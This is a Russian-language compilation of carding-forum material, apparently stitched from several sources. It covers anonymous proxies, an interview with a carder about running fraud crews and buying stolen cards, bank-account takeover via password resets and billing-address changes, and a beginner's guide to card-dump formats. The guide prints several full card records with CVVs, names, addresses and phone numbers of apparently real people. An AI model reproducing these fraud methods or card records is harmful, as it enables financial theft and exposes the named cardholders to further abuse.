Плюсы: доступность и легкость использования.

Минусы: большая часть полученных результатов - прокси-серверы, не пригодные для использования. Ввиду популярности метода большинство прокси - "дохлые", их скорость оставляет желать лучшего.

Другой метод заключается в использовании софта, который специально заточен под поиск прокси в инете. Одна из подобных программ - Proxy Hunter. Все что от тебя требуется, это ввести диапазон IP-адресов для проверки, остальное программа сделает сама. Интуитивно понятный интерфейс, простота в использовании, легкость в настройке и еще множество полезных функций - все это о Proxy Hunter.

Плюсы: легкость в использовании, возможность получения наглядных результатов. Минусы: на dialup’е придется изрядно подождать.

Проверка прокси на анонимность

Собственно, самое главное - не найти анонимный прокси, а убедиться, что он действительно анонимен. Иначе доказывай потом в отдаленных местах, что ты не жираф (УК РФ читал?).

И снова варианты. Первый - опять же через веб-ресурсы, а второй - софтина Proxy Checker. Скачиваешь, устанавливаешь, и ProxyChecker готов к работе. Для простоты работы программе можно отдать на съедение запрос "IP:port", после чего можно откинутся на спинку кресла и, попивая горячий чаек, ожидать результатов работы. Программа умная и может параллельно обрабатывать несколько запросов и дожидаться коннекта при очередном разрыве связи (диалапщики меня поймут). Удобно, что при проверке прокси на анонимность рядом с проверенными кандидатами указывается их скорость работы. В общем, золото, а не программа. Для комфортной работы требуется зарегистрировать программу, иначе она прекратит действовать по истечении 7 дней либо после 50 запусков.

Насаживаем браузер на прокси

Настройка любого браузера для работы с прокси во многом одна и та же, поэтому покажу на примере популярного браузера от компании Microsoft под скромным названием Internet Explorer.

В меню "Сервис" выбери пункт "Свойство обозревателя".

В открывшемся диалоговом окне перейди к закладке "Подключение".

Нажми кнопку "Настройка локальной сети", затем отметь CheckBox "Использовать прокси-сервер" и в строке "Адрес" введи IP-адрес прокси, а в строке "Порт" - соответственно порт (обычно 80 или 8080).

Вот и все, непосильный процесс настройки закончен.

Софт

Софта существует более чем достаточно, остановимся на двух проверенных экземплярах: SurfNow Professional и Anonymity 4 Proxy.

SurfNow Professional (9x/Me/NT/2k/XP)
  • shareware
  • (интерфейс английский, весит ~940 Кб)
При первом запуске программа просто очаровывает юзера - верх эстетики. Главная фишка шароварки - система поиска новых прокси. Теперь тебе не нужно мучительно ходить на security-сайты, чтобы увести из-под носа товарища еще не "юзанную" прокси. SurfNow все сделает за тебя (жалко, штаны не гладит и обед не готовит - прим. ред.). Программа доставляет удовольствие тремя способами: искать прокси с помощью google, вытащить список из заданного файла или, наконец, "пропарсить" определенный url на предмет IP-адресов.

Чтобы удостовериться, что прокси не "умерли", софтина сразу проверяет их на анонимность, что, согласись, очень удобно. Также разработчики не позабыли и столь нужные фичи, как смена прокси "на лету", возможность добавления в список проверенных бойцов и т.д. У программы есть ОДИН недостаток - это платность, обратись в асталависту.

Anonymity 4 Proxy (9x/Me/NT/2k/XP)
  • shareware
  • (интерфейс английский, весит ~1077 Кб)
Этот "комбайн" появился давно, но постоянно обновляется, с каждой версией становясь все привлекательнее. Возможности аналогичны SurfNow, так что выбирай сам.

Мучительный конец

Читай на ночь УК РФ и всегда заботься о своей безопасности (не только в инете).

Ресурс со списками прокси
Анонимайзеры

Есть в инете специальные службы – анонимайзеры. По сути, это веб-интерфейсы анонимных прокси-серверов. Заходишь на сервер анонимайзера, вводишь нужный адрес, и через некоторое время загружается нужный ресурс. При этом можешь быть уверен в своей приватности.

Анонимайзер как бы выступает посредником между тобой и просматриваемым сайтом, с которым ты соединяешься. В результате ты абсолютно анонимен - не известно ни твое местоположение, ни твой провайдер, ни твой истинный IP-адрес, одним словом, красота. Кроме этого, некоторые анонимайзеры умеют блокировать вредоносные скрипты и программы.

Все здорово, но главный недостаток анонимайзера - он существенно замедляет скорость загрузки страниц. Второй недостаток этих иногда полезных сервисов – за них надо платить. Бесплатны только "молодые" анонимайзеры, которые только раскручивают свои услуги. Некоторые анонимайзеры все-таки дают бесплатный доступ, но при этом все запросы идут с временной задержкой https://safeweb.norton.com/

В принципе, их достаточно в инете, зайди на любой поисковик и введи "анонимайзер" и "anonimizer".

Отдельно могу обрадовать умельцев - в инете можно найти исходники анонимайзеров и замутить свой собственный, возможно, только для себя любимого. К примеру, исходники когда-то популярного анонимайзера Freedom Network теперь раздаются совершенно бесплатно - https://www.theregister.com/2002/02/15/freedom_network_source_code_now/

Все типы proxy-серверов обычно делят на три категории: шлюзы, кешируюшие и анонимные proxy-сервера.

Анонимные прокси позволяют скрыть свой подлинный IP-адрес при манипуляциях в инете и при повседневном просмотре веб-страниц, закачке софта и т.п.

Ищут прокси-серверы двум методами: в поисковиках или через специальный софт. Самый простой и распространенный поиск - по-дедовски, в популярных поисковых системах, типа www.google.com, www.yahoo.com и т.д.

Программа доставляет удовольствие тремя способами: искать прокси с помощью google, вытащить список из заданного файла или, наконец, "пропарсить" определенный url на предмет IP-адресов.

Тайна бизнеса кардера

В любом бизнесе много сложностей и нюансов. Кардерский не исключение. Одной твоей целеустремленности мало для реализации столь прибыльного дела, как вещевой кардинг. Как показывает практика, для того чтобы выйти сухим из воды, сперва надо набраться опыта и лишь потом претворять свои планы в жизнь.

Я решил взять интервью у известного в узких кругах JensMiller’а. Этот человек реально знает, как построить свое дело и что для этого требуется.

JensMiller, традиционный первый вопрос: в чем суть вещевого кардинга, и почему он приобрел такую популярность?

Дело в том, что вещевой кардинг – одно из самых интересных, и в то же время доступных течений. Если человек знает, что делает, и имеет в подчинении хороших работников, его бизнес пойдет как по маслу. Главное найти подходящую жертву и следить за безопасностью.

Это в теории. А как добиться этого на практике? Что за работники будут принимать участие в бизнесе кардера?

Вообще, для того чтобы более-менее централизировать свое дело, кардеру необходимо найти опытных дропов, вбивальщиков и качественный картон. И только после этого можно выполнять какие-либо кардерские действия.

Дропы? Что-то я даже не слышал о такой профессии. Что это за люди, и где их следует искать?

Дропы – это попросту те, кто подставляет свою задницу и обналичивает чеки. Кроме того, дроп занимается принятием и сбытом товара. В идеале, такой человек должен приносить кардеру реальные бабки, ну и, соответственно, получать некоторый процент от них. Что касается поиска, этот народ ищется в основном на форумах по работе либо рекомендуются знакомыми кардерами.

Чем занимаются вбивальщики?

Вбивальщики занимаются только вбивом информации о карте в интернет-магазинах либо аукционах. Они играют огромную роль в жизни кардера, особенно когда ему лень вбивать данные самому. Это, как правило, начинающие кардеры, которые получают за свою работу довольно неплохие деньги, а также набираются опыта. Опыт же в кардинге – вещь незаменимая.

Хотелось бы знать реальную зарплату таких подчиненных.

Если вбивальщик получает некоторую сумму за каждый успешный вбив (а он подразумевает успешную сделку), ему выдается от 2 до 5$ (так плачу я). С дропом рассчитываются процентом от сделки. Когда это проверенный рекомендованный чел, ему отваливают 40-50%. Если же чувак был найден на форуме, то, пожалуй, он сам не подозревает, что является дропом. В этом случае зарплата копеечная – 5-10% от сделки. Хотя это тоже зависит от проводимой махинации.

С этим все ясно. Вернемся к третьему условию – качественному картону. Где взять валидные кредитки, и сколько они стоят?

Лучше картон добывать самому. Искать людей, которые выносят его с хостингов и инет-магазинов. Но это редко кому удается. В основном, карты продаются на буржуйских сетях типа DalNet и Efnet (большинство крупных каналов, кстати, были недавно прикрыты). Их распространяют проверенные люди, которые за счет этого живут. Картон считается качественным, если из 100 кредиток валидны не менее 95. Когда это условие нарушается, продавец обязан заменить товар.

Ты затронул очень важный вопрос – валидность карты. Как проверить положительный баланс? Существуют ли для этого свои методы?

Да, конечно. И методов довольно много. Начиная от банальной проверки с помощью порносайтов (безбожно устарело) и заканчивая X-login’ами.

Поиметь туда доступ непросто – обычно аккаунты продаются в различных местах, либо подбираются наудачу. Суть этого метода заключается в том, что сервер подает запрос банку, который отвечает, имеется ли сумма на карте. Хотя я считаю, что после всяких валидейшенов картон уже не является девственным, потому как все чекалки берут себе некоторый процент от запрошенной суммы. За услуги. Поэтому если чел, который распространяет картон, хорошо зарекомендовал себя – его товар не проверяется на валидность.

В каких местах кардер меняет карты на товар? Можешь привести примеры ресурсов?

Не могу. Это закрытая информация и доступна она лишь проверенным людям. Скажу лишь одно – не стоит кардить российские магазины, это бессмысленно.

Почему? Обязательно поймают?

Если соблюдал анонимность – не поймают, но товар тебе не вышлют, это проверенный факт. Да и зачем ломать свои, когда существуют буржуйские ресурсы. Иностранцы народ наивный и охотно расстаются с деньгами.

Раз уж мы заговорили о безопасности, тогда такой вопрос. Почему кадеров ловят – из-за плохих вбивальщиков и дропов или по собственной глупости?

Философский вопрос. Причины могут быть разными, но ловят в основном на мелочах (например, из-за захода с реального ip-адреса). Бывают и случаи, когда облажался дроп, тем самым подставив задницу кардера. Радует лишь то, что у нас в России кардинг приравнивается к обычному мошенничеству. Порой наши доблестные правоохранительные органы вообще с трудом представляют, как можно купить товар в интернете, да еще и расплатившись кредиткой. Но в любом случае, милиция пытается доказать, что кардер действительно осуществлял противозаконные махинации.

Если доказывают – судят?

Да, но, как я уже сказал, кардинг – всего лишь мошенничество. За это дают условный срок с конфискацией компа. За подробностями можешь заглянуть в уголовный кодекс – найдешь там много интересного. Кстати, судимостей за вещевой кардинг не так уж и много. В основном ловят за реал кардинг (подделка пластиковых карт). Здесь все довольно серьезно, вот, недавно взяли парней с поличным...

Что скажешь насчет безопасности? Можешь привести список полезных программ, которые помогают кардеру находиться в тени?

Да, могу. Но следует оговориться, что безопасность – это не проблема кардера, а задача вбивальщика. Он пользуется стандартным набором утилит, которые помогают ему в этом деле. Вот тебе заветный список – среди программ есть и тулзы, которые юзает сам кардер.
  • SocksChain - создает цепочку прокси или Socks-серверов для анонимности.
  • A4proxy - незаменимая прога при работе с HTTP проксями. Находит валидные и анонимные из огромного списка.
  • PGP - Софтина для шифрования данных на диске. Как альтернативу могу предложить BestCrypt (https://www.jetico.com/data-encryption/encrypt-files-bestcrypt-container-encryption).
Одного софта мало. Можешь сказать, где берут анонимные Socks и Proxy-сервера? Или это тоже закрытая информация?

Покупают. Для этого существуют свои тематические ресурсы.

Вообще достать подобные вещи не проблема – нужно лишь иметь аккаунт на сайте, либо знать стоящих людей, которые всегда подкинут тебе мегабайтовый листик прокси-серверов.

А теперь настало время для “интимного” вопроса. Какой заработок имеет кардер за месяц хорошей работы?

Как повезет. Все зависит от сделок, которые были успешно реализованы за промежуток времени. В основном совершается от десятка до сотни прибыльных сделок. При этом, если говорить о средней прибыли, кардер может получать от $1000 до $20000.

Неплохо! Признаться, даже мне захотелось заняться таким прибыльным делом.

Не все так просто. За такие деньги и проблем себе можешь нажить. В Сети существовали и будут существовать крысы, которые так и норовят кинуть честного кардера на бабки. Я говорю в основном о дропах, они не всегда честный народ. Хотя может кинуть кто угодно – продавец картона, проксиков и даже вбивальщик. Я уже ничему не удивлюсь.

А как определить, что тебя собираются кинуть? Или наверняка сказать невозможно?

Конечно, никак. Как и в реальной жизни, человек не знает, кто его может кинуть. Это человеческий фактор. Как правило, кидалы заносятся в черный список, который просматривается всеми кардерами. В нем можно найти ник, аську и координаты дропа (хотя, что мешает чуваку сменить ник?). Для этого, перед приемом на работу, у чувака просят скан паспорта. Эту процедуру проводят также для устрашения – человек дважды подумает насчет кидалова, если его попросят отсканировать документ.

Забавно, но кардеры сами иногда кидают дропов. Обещают им золотые горы, а затем забивают на них по полной. При этом наивный буржуин даже не способен ответить на кидалово.

Буржуин? Разве дропы не из России?

Нет. Как раз наоборот. Дропы, как правило, живут в USA и других странах. Наши ушлые представители могут кинуть кардера, как два байта переслать. Поэтому, если хочешь, чтобы твой бизнес процветал – учи иностранный язык, он тебе весьма пригодится.

Как гласит народная мудрость - главное вовремя остановиться. Актуально ли это для кардера?

Несомненно! Ловят именно из-за того, что кардер перегибает палку. Сначала он не может нарадоваться $1000, а потом ему становится мало $50 000. В итоге, после очередной крупной сделки – плачевный итог. Поэтому не стоит жадничать, и тогда все будет ок.

Какие ресурсы ты бы посоветовал для изучения кардерского мастерства? Есть ли такие вообще?

Carder.uk - на этом форуме есть все, что касается кардинга, не побоюсь этого слова. Там можно найти замечательные статьи, форум, где ежедневно обсуждаются проблемы кардинга, а также листы доверенных кардеров и кидал. Эта информация весьма полезна. Что примечательно, по кардингу пишут только в России и ближних странах СНГ. Это связано с тем, что за границей немного другие законы, поэтому кардерство там не прижилось.

На этой оптимистической ноте и завершим наше интервью. И последний вопрос - что бы ты хотел пожелать читателем журнала? Выбрать легкий, на первый взгляд, способ заработать на жизнь или не рисковать?

Этот путь далеко не легкий. Если кто привык воровать, то такая работа ему будет по душе. А когда жизнь только начинается, мой тебе совет - не лезь в это грязное дело, а заработай в другом месте. На худой конец, будь просто вбивальщиком, не больше.

Спасибо за замечательные ответы. Я думаю, теперь читатель поймет, что кардерство – действительно опасный бизнес, хотя и довольно прибыльный. От себя замечу, что я полностью согласен с автором – если тебе чуждо воровство, не стоит заниматься этим делом. Наживешь меньше проблем на свою пятую точку.

Теперь ты понимаешь всю сложность бизнеса кардера. Начать и поддерживать свое дело очень сложно. Постоянно приходится сотрудничать с разными людьми и сталкиваться с кидалами. Но, несмотря на это, кардинг процветает и будет популярен до тех пор, пока не введут новые законы, которые будут жестоко пресекать подобную деятельность.

Управляем банковским аккаунтом в онлайне

Компьютерные системы очень плотно вошли в нашу жизнь, так, что мы даже не задумываемся о них. Так же плавно в мир вошли электронные системы платежей, интернет-магазины, кредитные карты и многое-многое другое. Например, электронные банки. Несмотря на то, что это очень прогрессивное изобретение, которое день ото дня становится все популярнее (на западе), немногие знают о нем хоть что-то. Давай попробуем это исправить.

Что такое on-line banking

Онлайн-банкинг, он же электронный (e-banking) и домашний (home banking), это удаленное управление банковскими счетами посредством телефона (телебанкинг), персонального компьютера и интернета (интернет-банкинг) или портативных устройств (мобильный банкинг). Телебанкинг и мобильный банкинг мы пока отложим в сторону. А я расскажу тебе о типах on-line банков.

Существуют так называемые виртуальные банки - работающие с клиентами исключительно через интернет, и, в отличие от традиционных банков, не располагающие филиальной сетью. И есть традиционные банки, которые используют возможности интернета для удаленного банковского обслуживания своих клиентов. То есть помимо обычных своих сервисов, банк использует в качестве дополнительной услуги интернет-управление аккаунтами вкладчиков. Такой банк называется интернет-банком.

Ты спросишь, в чем же преимущество интернет-банков? В том, что где бы ты ни находился и что бы ни делал, имея под рукой компьютер с доступом в интернет, ты легко можешь управлять своими капиталами. Около 35 процентов европейцев, пользующихся интернетом, так и делают. В России дела обстоят немного по-другому: так как число пользователей интернета составляет всего 17 процентов от общего населения страны, то такой услугой, как онлайн-банкинг, пользуется лишь один из двухсот сорока семи юзеров. При этом он является юридическим лицом и разбирается в программном обеспечении на уровне «выше среднего». В России уже есть 10 крупных банков, предоставляющих своим клиентам такую услугу. Согласно информации, полученной с сайта Интер Финанс, в скором будущем откроются еще два, а значит - спрос на эти услуги все-таки есть.

И еще немного об удобствах и возможностях on-line banking’а. Список стандартных операций с аккаунтом через интернет, предлагаемых банками пользователям, почти везде одинаков. Это, естественно, просмотр текущего баланса и состояния счета, перевод и пополнение денежных средств. Пополнить счет можно как наличными, так и через банкомат, воспользовавшись пластиковой картой. Можно и закрыть счет. Вот только зачем? Существуют и бонусные возможности - например, заполнив специальный договор, можно получить в банке кредит. И это еще далеко не все.

Очевидно, что при пользовании on-line banking’ом тебе не придется бегать в банк и стоять в очереди, чтобы получить деньги или пополнить счет. Все гениальное просто. Так что, не отрывая пятой точки от кресла, можно произвести практически все те же операции, что и при посещении банка. Поэтому всякие умные люди, вроде Бори Березовского, используют систему интернет-банкинга. Прикинь, как пришлось бы заморачиваться бедняге, посещая несколько банков в разных частях мира, при том, что в некоторые страны его не пускают, а в некоторых еще и арестовать могут.

Кстати, некоторые банки предоставляют эту услугу абсолютно бесплатно, достаточно написать заявление.

Теперь еще о бонусах. У каждого банка есть как свои заморочки, так и свои достоинства. Так как я не смог объездить и обзвонить все банки, предоставляющие услуги онлайн-доступа (я рассматриваю только русские онлайн-банки), я позволил себе воспользоваться информацией из интернета.

Оказалось, что в некоторых банках имеет место реферальная система (как, например, в старой доброй спедии). Если ты привел, допустим, в Гута-Банк одного реферала, то получаешь 2 месяца бесплатного обслуживания. А если ты еще и старый клиент, то твой друг тоже получит 3 месяца фо фри. Также Гута-Банк позволяет тебе БЕСПЛАТНО открыть карточку Visa Electron.

В некоторых банках возможно установить лимит денежного перевода. Заметь, что переводы через интернет-банкинг считаются безналичными, и, соответственно, налогом с продаж не облагаются, что является реальным шансом сэкономить свои кровные.

Уверен, тебе уже захотелось открыть свой аккаунт в каком-нибудь онлайн-банке. Читай дальше, потому что именно об этом я и собираюсь рассказать. Особое внимание мы уделим безопасности, поскольку работать тебе придется с реальными деньгами.

К сожалению, полностью обезопаситься невозможно. Все, что сделано одним человеком, другой человек в силах сломать. Правда, в российских банках защита почти всегда на высшем уровне. И пользователю практически не придется заботиться о безопасности своей системы. В некоторых банках существуют как программные, так и аппаратные уровни защиты. Из аппаратных существуют USB-ключи и адаптерные ключи, по внешнему виду и устройству похожие на обычные ключи от домофонов. Но это не всегда хорошо. Как поступить, если на компьютере нет USB-порта? А если ты уезжаешь в отпуск, придется брать адаптер и ключ с собой. Ведь интернет-банкинг и создан для того, чтобы им управлять удаленно. Ключ можно потерять, а за новый придется платить даже больше, чем за первый, так как надо будет еще оплатить деактивацию старого ключа. Ключи, правда, стоят относительно недорого - в пределах 800 рублей. Если ты спросишь, какой из них выбрать, я бы посоветовал именно USB-ключ. Он более надежен. Такой ключ шифрует данные, передаваемые тобой во время работы с банком.

Кстати, если клиент (то есть ты) сочтет, что оборудование, которое он приобрел для доступа к интернет-банкингу, его не устраивает, то, согласно закону о защите прав потребителей, он имеет право вернуть свои деньги, в случае если он пользовался интернет-банкингом не более 30 дней. А в «Альфа Банк Экспресс» программное обеспечение вообще выдается пользователям бесплатно (судя по всему, оно просто входит в стоимость подключения к услуге). Отсюда вывод – русские банки самые банковые банки в мире! У американцев нет таких бонусов. И при этом, у них в большинстве случаев просто ужасная система авторизации. Не веришь? Я готов доказать. Для примера возьмем банк Калифорнии и CityBank. В СитиБанке от тебя требуется пин-код карты. В продаже можно легко найти или вытрейдить у кого-либо карты с пин-кодом. В банке Калифорнии необходим всего лишь номер карты и пароль. А в случае утери пин-кода или ключа, тебе скажут что-нибудь вроде: «Спасение утопающих - дело рук самих утопающих» (сам потерял, сам и разбирайся). А за то, чтобы они взяли на себя обязательство найти кардера, тебе придется отвалить им определенный процент от вклада или просто заплатить кучу денег. Вот такие «американские банки». Пожалуй, это один из тех немногих случаев, когда в России какая-то услуга организована реально лучше зарубежной. Именно РЕАЛЬНО, а не в соответствии с пословицей «что для русского халява – для американца 2 года тюремного заключения».

Так как же все-таки обезопасить свой вклад? Во-первых, никогда и нигде не называй свой пароль доступа, пин-код. Обращай внимание на протокол передачи данных. Если это http, то стоит задуматься, надо ли? Когда откроется страница-форма для ввода данных кредитной карты, посмотри на строку адреса, вернее – на ее конец. Если там ты видишь «https», то можно эту форму заполнить. Если нет, то уходи с этого сайта. Это относится и к интернет-магазинам. Более 40 процентов кредитных карт добываются кардерами методом замены страницы какого-либо сайта на свою, которая пишет номера и прочую информацию, введенную обладателем карты, в лог. Остальные методы защиты стандартны. Пользоваться антивирусной программой, фаерволом, не открывать вложения из непонятных писем, не сообщать друзьям, а тем более незнакомым людям, информацию о своей кредитной карте/банковском аккаунте.

Обзор онлайн-банка

Самое время рассмотреть реальный пример онлайн-банка. Это будет ТПСБанк (г. Томск).

Вот как истолковывают менеджеры банка понятие «интернет-банк»:

«Интернет-банк - это новая компьютерная система проведения электронных платежей через глобальную сеть Internet, которая позволит вам с максимальной скоростью и надежностью осуществлять платежи в рублях и иностранной валюте из любой точки земного шара через наш банк, а также получать выписки по своим счетам и обмениваться сообщениями с сотрудниками банка, экономя при этом массу времени. Все, что вам необходимо иметь при себе - это дискета с секретным ключом и доступ к интернету. Такая система должна стать основной формой общения клиента с банком в области расчетного обслуживания». Так-так, значит, в этом банке используется система защиты с помощью ключа на дискетке. Ну что ж, хороший вариант. При регистрации (офлайновой, в реальном банке) пользователя подводят к компьютеру, он жмет на кнопку в генераторе, создавая таким образом ключ. Ключ записывается в базу данных напротив логина и пароля. То есть, пользователь сначала логинится, а потом уже использует ключ. Логин и пароль этим ключом не шифруются. Ключ лежит в базе, и вся информация, поступающая от пользователя, сначала поступает на сервер зашифрованной, там берется ключ, соответствующий этому пользователю, и информация декодируется.

Вот что можно делать, используя услугу «Онлайн-банк» компании «ТПСБанк»:
  1. Отправлять в банк все виды финансовых документов, включая платежные поручения, и осуществлять валютные переводы.
  2. Получать из банка выписки по своим счетам за любой период с момента начала работы счета.
  3. Осуществлять контроль над текущим состоянием документов в банке.
  4. Обмениваться сообщениями с сотрудниками банка.
Для регистрации нам необходимо:
  1. Открыть счет в ОАО "Томскпромстройбанк" (если нет счета).
  2. Провести предварительную регистрацию с помощью системы "интернет-банк", сгенерировать и зарегистрировать ключи ЭЦП клиента.
  3. Получить сертификат открытого ключа клиента, распечатать и заверить его круглой печатью и подписями ответственных лиц, образцы которых содержатся в банковской карточке образцов подписей.
  4. Загрузить бланк договора на обслуживание в системе "интернет-банк" и заполнить его.
  5. Заключить договор на обслуживание в системе "интернет-банк" и произвести окончательную регистрацию в банке (при наличии распечатанного сертификата).
Примечание: информация о банке взята с его сайта и автором не изменялась.

Хочу представить твоему вниманию еще один банк, под названием «О.В.К. Банк». Он просто поразил меня своим феноменальным легкомыслием. Для авторизации надо знать ТОЛЬКО номер кредитки и expiration date (дата окончания действия кредитной карты). На худой конец - только номер. Пробрутфорсить дату окончания не составит труда. Ведь в этом году максимальный срок действия карты – приблизительно до 2010 года. Таким образом, имея 12 месяцев в каждом году, мы получаем 120 комбинаций. Такое можно подобрать и руками, без помощи специального софта.

Немного о кардинге

Если ты в курсе, что такое кардинг, и интересуешься этим, то тебе должно быть известно, что кардеры очень часто ищут карты с онлайн-доступом и покупают их за бешеные деньги. Могу сказать, что дело того стоит. Кто пробовал заниматься кардингом, наверное, заметил, что часто бывает так: закажешь что-нибудь вещественное, на себя или на дропа по левой креде, а оно не приходит. А дело в том, что, по умолчанию, товар может отправляться только на биллинг-адрес, то есть на адрес владельца карты. Но ведь другие как-то заказывают! А делают они это так: заходят в онлайн-банкинг и изменяют реквизиты владельца счета (соответственно и креды) на реквизиты дропа. Некоторые банки позволяют через онлайн изменить даже ФАМИЛИЮ И ИМЯ владельца. Но это в большинстве случаев не обязательно. И если заказ проверяют в e-shop’e, то звонят в банк-эмитент кредитки, по которой сделан заказ. Им, естественно, говорят, что у хозяина креды адрес и телефон действительно такие, какие ты ввел. Магазин примет это к сведению и может еще раз позвонить, но уже не в банк, а дропу, который подтвердит заказ.

Но если ты не сменил биллинг-адрес кредитки в банке, и, позвонив туда, менеджеры магазина узнают, что это адрес не настоящего владельца креды, то они легко узнают его реальный телефон (который ты не изменил). После чего позвонят ему и спросят, заказывал ли он для Васисуалия Пупкина двухмоторную яхту. Если нет… то ему сообщают реквизиты дропа со всеми вытекающими последствиями.

Как ты заметил, для доступа к банковскому аккаунту обычно нужен номер кредитной карты и пароль, реже имя пользователя и пароль. При регистрации обычно указываются конфиденциальные данные пользователя. К примеру, девичья фамилия матери, номер страхового полиса, дата рождения и.т.д. Но достать кредитки с этой информацией не составляет труда. Как хакеры это делают, я не знаю, возможно, с помощью троянов, или взламывают эти самые онлайн-банки. Но пароль… если у тебя есть кредитка со всей инфой (SSN, MMN, DOB), можно попытать счастье и попробовать восстановить пароль. Некоторые банки предлагают восстановить пароль прямо в онлайне, но в большинстве случаев придется звонить в службу поддержки банка, где надо будет называть всю эту информацию. Если ты все скажешь правильно, тебе поменяют пароль.

Если клиент сочтет, что оборудование, которое он приобрел для доступа к интернет-банкингу, его не устраивает, то, согласно закону о защите прав потребителей, он имеет право вернуть свои деньги, в случае если он пользовался интернет-банкингом не более 30 дней.

Что такое СС

СС это Credit card.

VISA
Eurocard/Mastercard
JCB
DinersClub International
DinersClub valid in Russia
American Express
Visa Electron
Eurocard/Mastercard Cirrus/Maestro

VISA
- на карте VISA после даты окончания действия карты изображен значок “V” такой же как первая буква логотипа;
- Начальная цифра Visa – 4
- На поле подписи (обратная сторона) повторен номер карты + 3 цифры секретного кода

Mastercard
- на карте Mastercard после даты окончания действия карты изображен значок MC
- Начальная цифра Mastercard - 5
- На поле подписи (обратная сторона) повторен номер карты + 3 цифры секретного кода

JCB
- на карте JCB после даты окончания действия карты изображен значок "J" или “звездочка JCB”
- Начальная цифра JCB - 35

DinersClub
- На карте DinersClub после даты окончания действия карты изображен логотип круг с вертикальной чертой
- Начальные цифры DinersClub - 30, 36, 38, 39
- На поле подписи (обратная сторона) повторен номер карты + 3 цифры секретного кода
- На лицевой стороне справа две буквы секретного кода

American Express
- Начальная цифра AmericanExpress - 37
- существуют карты Centurion, Corporate, Optima и Hertz

Необходимые Вам данные для кардинга:

CC number
CVC
EXP
First name
Last name
Street, house number
Sity
Country
State
Zip
Phone number

Credit card - это кредитная карта, у нас же имеется необходимая инфа с неё, она же называется сс, картон, картошка, карты и т.д

Давайте разберемся как примерно выглядят сс инфо трёх самых необходимых и популярных стран. (USA/UK/DE)

Мы не разбираем full info, т.е. ничего дополнительного, только основное.

USA (United States):

5256502253097617 - Сам номер сс (credit card num)

0924 - exp (срок действия карты) 09 месяц 24 год

502 - cvv (секретный код)

Jorge Bailon - имя хранителя карты (cardholder name)

15760 SW 69 ld - улица (street)

miami - город (city)

FL - штат (state)

33193 - зип код (zip code)

US - страна (coutry)

3055051991 - номер телефона (phone num)

VISA - тип карты (type)

К USA сс еще можно добавить SSN, DL, MMN, DOB, credit report и т.д. и т.п.

UK (United Kingdom):

5178057252945584 - cc num

1224 - exp

849 - cvv

Feiyue Ma - cardholder name

8 Wilberforce Road - street

Norwich - city

NFK - это королевство, штат, графство и т.д (county)

GB - country

NR5 8ND - zip code

07883894260 - phone num

Master Card - type

В ЮК как правило берут только DOB как дополнительное инфо. Еще иногда sort code (код сортировки сс), эта инфа нужна

для обхода вбв (verified by visa).

DE (Deutschland):

4344990165183012 - cc num

1124 - exp

830 - cvv

Visa - type

Alexander Reitzenstein - cardholder name

Wichertstrase 38a - street

Berlin - city

10439 - zip-code

030/20055321 - phone num

Deutschland - coutry

В Германии как правило при вбв спрашивает DOB, штатов нету.

Первое, что начинающий кардер должен изучить, так это конечно же информацию о кредитных картах, проще говоря картон / СС.

Итак, приступим.

Первым делом нам нужно найти картон. Самый простой вариант это купить его у продавца. При покупки вы получите картон примерно в таком формате:

Code:
4306651004564350 | 10/24 | 826 | Richard Lang | 56 Groveview Cir | Rochester | 14612| NY | USA | 661-298-0881

(Формат у каждого продавца бывает разным)

• 4306651004564350 - Номер кредитной карты.

• 10/24 (10 месяц / 24 год) - Дата окончания действия карты.

• 826 - Защитный код карты CVV/CVV2

• Richard Lang – First и Last Name (??мя, Фамилия)

• 56 Groveview Cir – Адрес

• Rochester – Город

• 14612 – Zip code (зип)

• NY (New York) – Штат

• USA – Страна

• 661-298-0881 - Телефон

За дополнительные $ вы можете пробить дополнительную информацию:

Данные пункты пробиваются в основном для создания Enroll'a, поэтому если вас интересует просто вбив, то они вам скорее всего не понадобятся.

• DOB - дата рождения

• SSN - номер социального страхования

• MMN - Mothers Middle Name (отчество матери, так сказать)

Теперь немного конкретизации, касательно каждого вида карты:

Visa

• Номера кредиток Visa начинаются с цифры 4

• Имеется защита под названием Verified by Visa (VBV)

• 3х значный CVV код

Verified by Visa - уникальная услуга, в которой личный пароль или идентификационная информация используются для защиты номеров карт Visa от несанкционированного использования. Проще говоря у холдера есть код который он должен будет ввести при покупки чего либо.

MasterCard

• Номера кредиток MasterCard начинаются с цифры 5

• Имеется защита под названием MasterCard SecureCode (MCSC)

• 3х значный CVV код

MasterCard SecureCode - принцип работы тот же, что и у VBV.

American Express

• Номера кредиток American Express начинаются с цифры 3

• 4х значный CVV код

Discover

• Номера кредиток Discover начинаются с цифры 6

• 3х значный CVV код

Как определить Zip / Штат / Телефон

1) Заходим на сайт zipcodes.addresses.com/zip_code_lookup.php

(Например, у нас есть город и зип, как определить штат?|Summerville|30747|United States

2) Вбивем город в поле City и выбираем первый попавшийся штат. (допустим это будет GA)

3) Далее нам выводится результат, где мы сверяем Zip тот что указан в картоне и где указано поле ZIP COD на сайте.

4) Как мы видим Зипы совпали а значит наш штат это GA

5) Так же в поле AREA CODE указаны первые три цифры телефона штата

Bin - первые 6-ть цифр в номере кредитной карты, индификатор банка который выдал карту.

Например карта 4306651004564350, где 430665 - номер банка который выдал карту:

Wescom C.U. DEBIT CLASSIC USA Pasadena California CA

сайтик для пробива:

http://www.binchecker.com/

Вот тут ещё на крайняк:

http://en.wikipedia.org/wiki/List_of_Bank_Identification_Numbers

4128004082601569 - Это НОМЕР самой карты !

После этого видно что написано VISA (выбираем VISA)

09|2024 - Это месяц и год окончания карты в основном он пишется так 0924!

|Catherine|Chandler| - Это имя и фамилия кардхолдера (владельца карты)!

|952| - Это код карты CVV

|308 Swagg Cove Rd.| - Это адрес

|Wedowee| - Это город

|AL| - Это штат

|36278| - индекс или post code

|USA| - естественно страна карты

Остальное не пригадится ,но для пояснения:

|7702965721| - номер телефона владельца (вбивайте скайп угарайте над ними)

[email protected] | - Это e-mail владельца карты (кардхолдер)

COUNTRY - Это страна

FIRST NAME - Имя

LAST NAME - Фамилия

STREET ADDRESS - Адрес

CITY - Город

STATE / PROVINCE - Область или штат в зависимости где проживаете!

ZIP CODE - Индекс

PHONE - Номер телефона , ну тут бред пишите )

EMAIL - Ваш e-mail

Теперь ещё по поводу карт:

На 3 начинается - AMEX (American Express)

На 4 начинается - VISA

На 5 начинается - MasterCard

На 6 начинается - Discover

Шифрование ICQ и прочих програм

Если вас заботит проблема перехвата сообщений злобным админом и другими спецслужбами то выход Simp Lite-ICQ-AIM, который поддерживает MSN Messenger, Yahoo! Messenger, ICQ/AOL Instant Messenger (AIM), Jabber/Google Talk.

